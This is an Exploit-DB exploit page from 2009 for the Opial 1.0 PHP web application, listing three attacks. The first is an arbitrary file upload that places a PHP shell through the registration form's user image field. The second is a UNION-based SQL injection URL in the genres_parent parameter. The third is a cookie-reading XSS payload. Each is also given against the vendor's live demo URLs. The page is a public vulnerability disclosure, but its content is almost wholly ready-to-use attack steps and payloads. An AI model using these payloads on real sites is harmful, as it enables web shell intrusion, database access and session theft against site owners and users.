Exploit

EDB-ID: 9122	Author: LMaster	Published: 2009-07-11
CVE: CVE-2009-3751...	Type: Webapps	Platform: PHP
Aliases: N/A	Advisory/Source: N/A	Tags: Vulnerability
E-DB Verified:	Exploit: Download / View Raw	Vulnerable App: N/A

« Previous Exploit Next Exploit »

::::::::::::::::::::R3AL.RU::::::::::::::::::::

Opial 1.0 Arbitrary File Upload & XSS & SQL Injection (genres_parent)

Author: LMaster

Greetz: r3al.ru

Official Site (with demo):

http://www.opial.com

-->Arbitrary File Upload<--

1. Go to http://www.site.com/register.php
2. Disable JavaScript
3. Upload shell as "User Image"
4. Register
5. Shell location: http://www.site.com/userimages/SHELL.PHP

-->SQL Injection<--

http://www.site.com/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6--

-->XSS<--

http://www.site.com/home.php?genres_parent="><script>alert(document.cookie);</script>

Demo:

http://www.opial.com/demo/register.php

http://www.opial.com/demo/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6--

http://www.opial.com/demo/home.php?genres_parent=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

LMaster.

# milw0rm.com [2009-07-11]

Related Exploits

Trying to match CVEs (3): CVE-2009-3751, CVE-2009-3752, CVE-2009-3753
Trying to match OSVDBs (3): 59191, 59192, 59193
Other Possible E-DB Search Terms: Opial 1.0, Opial

Date	Title	Author
2009-07-02	Opial 1.0 - 'albumID' SQL Injection	ThE g0bL!N
2009-07-02	Opial 1.0 - Authentication Bypass	Moudi
2006-09-25	Opial AV Download Management 1.0 - 'index.php' Cross-Site Scripting	meto5757
2012-04-30	Opial CMS 2.0 - Multiple Vulnerabilities	Vulnerabili...

Opial 1.0 - Arbitrary File Upload / Cross-Site Scripting / SQL Injection

Related Exploits